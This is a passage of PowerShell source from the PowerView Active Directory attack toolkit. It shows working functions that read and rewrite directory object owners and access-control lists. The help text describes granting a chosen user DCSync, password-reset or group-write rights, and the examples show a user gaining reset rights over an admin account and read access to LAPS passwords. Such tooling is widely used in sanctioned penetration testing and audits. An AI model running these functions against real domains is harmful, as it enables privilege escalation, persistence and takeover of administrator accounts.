.PARAMETER InheritedObjectType
Specifies the type of object that can inherit the ACE.
.EXAMPLE
$Guids = Get-DomainGUIDMap
$AdmPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'ms-Mcs-AdmPwd'} | select -ExpandProperty name
$CompPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'Computer'} | select -ExpandProperty name
$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity itadmin -Right ExtendedRight,ReadProperty -AccessControlType Allow -ObjectType $AdmPropertyGuid -InheritanceType All -InheritedObjectType $CompPropertyGuid
$OU = Get-DomainOU -Raw Workstations
$DsEntry = $OU.GetDirectoryEntry()
$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'
$dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)
$dsEntry.PsBase.CommitChanges()
Adds an ACE to all computer objects in the OU "Workstations" permitting the
user "itadmin" to read the confidential ms-Mcs-AdmPwd computer property.
.OUTPUTS
System.Security.AccessControl.AuthorizationRule
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('System.Security.AccessControl.AuthorizationRule')]
[CmdletBinding()]
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, Mandatory = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String]
$PrincipalIdentity,
[ValidateNotNullOrEmpty()]
[String]
$PrincipalDomain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Parameter(Mandatory = $True)]
[ValidateSet('AccessSystemSecurity', 'CreateChild','Delete','DeleteChild','DeleteTree','ExtendedRight','GenericAll','GenericExecute','GenericRead','GenericWrite','ListChildren','ListObject','ReadControl','ReadProperty','Self','Synchronize','WriteDacl','WriteOwner','WriteProperty')]
$Right,
[Parameter(Mandatory = $True, ParameterSetName='AccessRuleType')]
[ValidateSet('Allow', 'Deny')]
[String[]]
$AccessControlType,
[Parameter(Mandatory = $True, ParameterSetName='AuditRuleType')]
[ValidateSet('Success', 'Failure')]
[String]
$AuditFlag,
[Parameter(Mandatory = $False, ParameterSetName='AccessRuleType')]
[Parameter(Mandatory = $False, ParameterSetName='AuditRuleType')]
[Parameter(Mandatory = $False, ParameterSetName='ObjectGuidLookup')]
[Guid]
$ObjectType,
[ValidateSet('All', 'Children','Descendents','None','SelfAndChildren')]
[String]
$InheritanceType,
[Guid]
$InheritedObjectType
)
Begin {
$PrincipalSearcherArguments = @{
'Identity' = $PrincipalIdentity
'Properties' = 'distinguishedname,objectsid'
}
if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }
if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }
$Principal = Get-DomainObject @PrincipalSearcherArguments
if (-not $Principal) {
throw "Unable to resolve principal: $PrincipalIdentity"
} elseif($Principal.Count -gt 1) {
throw "PrincipalIdentity matches multiple AD objects, but only one is allowed"
}
$ADRight = 0
foreach($r in $Right) {
$ADRight = $ADRight -bor (([System.DirectoryServices.ActiveDirectoryRights]$r).value__)
}
$ADRight = [System.DirectoryServices.ActiveDirectoryRights]$ADRight
$Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$Principal.objectsid)
}
Process {
if($PSCmdlet.ParameterSetName -eq 'AuditRuleType') {
if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag
} elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType)
} elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType
} elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType
} elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType
} elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType, $InheritedObjectType
}
}
else {
if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType
} elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType)
} elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType
} elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType
} elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType
} elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType, $InheritedObjectType
}
}
}
}
function Set-DomainObjectOwner {
<#
.SYNOPSIS
Modifies the owner for a specified active directory object.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainObject
.DESCRIPTION
Retrieves the Active Directory object specified by -Identity by splatting to
Get-DomainObject, returning the raw searchresult object. Retrieves the raw
directoryentry for the object, and sets the object owner to -OwnerIdentity.
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
of the AD object to set the owner for.
.PARAMETER OwnerIdentity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
of the owner to set for -Identity.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
Set the owner of 'dfm' in the current domain to 'harmj0y'.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred
Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String]
$Identity,
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[Alias('Owner')]
[String]
$OwnerIdentity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$OwnerSid = Get-DomainObject @SearcherArguments -Identity $OwnerIdentity -Properties objectsid | Select-Object -ExpandProperty objectsid
if ($OwnerSid) {
$OwnerIdentityReference = [System.Security.Principal.SecurityIdentifier]$OwnerSid
}
else {
Write-Warning "[Set-DomainObjectOwner] Error parsing owner identity '$OwnerIdentity'"
}
}
PROCESS {
if ($OwnerIdentityReference) {
$SearcherArguments['Raw'] = $True
$SearcherArguments['Identity'] = $Identity
# splat the appropriate arguments to Get-DomainObject
$RawObject = Get-DomainObject @SearcherArguments
ForEach ($Object in $RawObject) {
try {
Write-Verbose "[Set-DomainObjectOwner] Attempting to set the owner for '$Identity' to '$OwnerIdentity'"
$Entry = $RawObject.GetDirectoryEntry()
$Entry.PsBase.Options.SecurityMasks = 'Owner'
$Entry.PsBase.ObjectSecurity.SetOwner($OwnerIdentityReference)
$Entry.PsBase.CommitChanges()
}
catch {
Write-Warning "[Set-DomainObjectOwner] Error setting owner: $_"
}
}
}
}
}
function Get-DomainObjectAcl {
<#
.SYNOPSIS
Returns the ACLs associated with a specific active directory object. By default
the DACL for the object(s) is returned, but the SACL can be returned with -Sacl.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted.
.PARAMETER Sacl
Switch. Return the SACL instead of the DACL for the object (default behavior).
.PARAMETER ResolveGUIDs
Switch. Resolve GUIDs to their display names.
.PARAMETER RightsFilter
A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs
Get the ACLs for the matt.admin user in the testlab.local domain and
resolve relevant GUIDs to their display names.
.EXAMPLE
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
Enumerate the ACL permissions for all OUs in the domain.
.EXAMPLE
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs -Sacl
Enumerate the SACLs for all OUs in the domain, resolving GUIDs.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs
.OUTPUTS
PowerView.ACL
Custom PSObject with ACL entries.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.ACL')]
[CmdletBinding()]
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String[]]
$Identity,
[Switch]
$Sacl,
[Switch]
$ResolveGUIDs,
[String]
[Alias('Rights')]
[ValidateSet('All', 'ResetPassword', 'WriteMembers')]
$RightsFilter,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{
'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid'
}
if ($PSBoundParameters['Sacl']) {
$SearcherArguments['SecurityMasks'] = 'Sacl'
}
else {
$SearcherArguments['SecurityMasks'] = 'Dacl'
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$Searcher = Get-DomainSearcher @SearcherArguments
$DomainGUIDMapArguments = @{}
if ($PSBoundParameters['Domain']) { $DomainGUIDMapArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $DomainGUIDMapArguments['Server'] = $Server }
if ($PSBoundParameters['ResultPageSize']) { $DomainGUIDMapArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $DomainGUIDMapArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Credential']) { $DomainGUIDMapArguments['Credential'] = $Credential }
# get a GUID -> name mapping
if ($PSBoundParameters['ResolveGUIDs']) {
$GUIDs = Get-DomainGUIDMap @DomainGUIDMapArguments
}
}
PROCESS {
if ($Searcher) {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^S-1-.*') {
$IdentityFilter += "(objectsid=$IdentityInstance)"
}
elseif ($IdentityInstance -match '^(CN|OU|DC)=.*') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainObjectAcl] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$Searcher = Get-DomainSearcher @SearcherArguments
if (-not $Searcher) {
Write-Warning "[Get-DomainObjectAcl] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
$GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
$IdentityFilter += "(objectguid=$GuidByteString)"
}
elseif ($IdentityInstance.Contains('.')) {
$IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
}
else {
$IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))"
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainObjectAcl] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
if ($Filter) {
$Searcher.filter = "(&$Filter)"
}
Write-Verbose "[Get-DomainObjectAcl] Get-DomainObjectAcl filter string: $($Searcher.filter)"
$Results = $Searcher.FindAll()
$Results | Where-Object {$_} | ForEach-Object {
$Object = $_.Properties
if ($Object.objectsid -and $Object.objectsid[0]) {
$ObjectSid = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value
}
else {
$ObjectSid = $Null
}
try {
New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Object['ntsecuritydescriptor'][0], 0 | ForEach-Object { if ($PSBoundParameters['Sacl']) {$_.SystemAcl} else {$_.DiscretionaryAcl} } | ForEach-Object {
if ($PSBoundParameters['RightsFilter']) {
$GuidFilter = Switch ($RightsFilter) {
'ResetPassword' { '00299570-246d-11d0-a768-00aa006e0529' }
'WriteMembers' { 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
Default { '00000000-0000-0000-0000-000000000000' }
}
if ($_.ObjectType -eq $GuidFilter) {
$_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
$_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid
$Continue = $True
}
}
else {
$_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
$_ | Add-Member NoteProperty 'ObjectSID' $ObjectSid
$Continue = $True
}
if ($Continue) {
$_ | Add-Member NoteProperty 'ActiveDirectoryRights' ([Enum]::ToObject([System.DirectoryServices.ActiveDirectoryRights], $_.AccessMask))
if ($GUIDs) {
# if we're resolving GUIDs, map them them to the resolved hash table
$AclProperties = @{}
$_.psobject.properties | ForEach-Object {
if ($_.Name -match 'ObjectType|InheritedObjectType|ObjectAceType|InheritedObjectAceType') {
try {
$AclProperties[$_.Name] = $GUIDs[$_.Value.toString()]
}
catch {
$AclProperties[$_.Name] = $_.Value
}
}
else {
$AclProperties[$_.Name] = $_.Value
}
}
$OutObject = New-Object -TypeName PSObject -Property $AclProperties
$OutObject.PSObject.TypeNames.Insert(0, 'PowerView.ACL')
$OutObject
}
else {
$_.PSObject.TypeNames.Insert(0, 'PowerView.ACL')
$_
}
}
}
}
catch {
Write-Verbose "[Get-DomainObjectAcl] Error: $_"
}
}
}
}
}
function Add-DomainObjectAcl {
<#
.SYNOPSIS
Adds an ACL for a specific active directory object.
AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainObject
.DESCRIPTION
This function modifies the ACL/ACE entries for a given Active Directory
target object specified by -TargetIdentity. Available -Rights are
'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended
rights GUID can be set with -RightsGUID. These rights are granted on the target
object for the specified -PrincipalIdentity.
.PARAMETER TargetIdentity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
for the domain object to modify ACLs for. Required. Wildcards accepted.
.PARAMETER TargetDomain
Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.
.PARAMETER TargetLDAPFilter
Specifies an LDAP query string that is used to filter Active Directory object targets.
.PARAMETER TargetSearchBase
The LDAP source to search through for targets, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER PrincipalIdentity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
for the domain principal to add for the ACL. Required. Wildcards accepted.
.PARAMETER PrincipalDomain
Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Rights
Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.
Defaults to 'All'.
.PARAMETER RightsGUID
Manual GUID representing the right to add to the target.
.EXAMPLE
$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
...
Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local
Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
AceQualifier : AccessAllowed
ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Force-Change-Password
ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
.EXAMPLE
$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid
Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}
[no results returned]
$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local
Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }
AceQualifier : AccessAllowed
ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Force-Change-Password
ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
.LINK
https://adsecurity.org/?p=1906
https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
Param (
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String[]]
$TargetIdentity,
[ValidateNotNullOrEmpty()]
[String]
$TargetDomain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$TargetLDAPFilter,
[ValidateNotNullOrEmpty()]
[String]
$TargetSearchBase,
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String[]]
$PrincipalIdentity,
[ValidateNotNullOrEmpty()]
[String]
$PrincipalDomain,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
